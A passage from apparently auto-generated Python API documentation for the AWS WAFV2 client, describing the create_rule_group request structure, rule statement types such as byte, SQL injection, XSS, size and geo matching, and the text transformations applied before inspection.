:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a RegexPatternSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a RegexPatternSet , and the ARN, that you provide to the RegexPatternSetReferenceStatement to use the pattern set in a Rule .
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def create_rule_group(Name=None, Scope=None, Capacity=None, Description=None, Rules=None, VisibilityConfig=None, Tags=None):
"""
Creates a RuleGroup per the specifications provided.
A rule group defines a collection of rules to inspect and control web requests that you can use in a WebACL . When you create a rule group, you define an immutable capacity limit. If you update a rule group, you must stay within the capacity. This allows others to reuse the rule group with confidence in its capacity requirements.
See also: AWS API Documentation
Exceptions
:example: response = client.create_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Capacity=123,
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Capacity: integer
:param Capacity: [REQUIRED]\nThe web ACL capacity units (WCUs) required for this rule group.\nWhen you create your own rule group, you define this, and you cannot change it after creation. When you add or modify the rules in a rule group, AWS WAF enforces this limit. You can check the capacity for a set of rules using CheckCapacity .\nAWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.\n
:type Description: string
:param Description: A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) 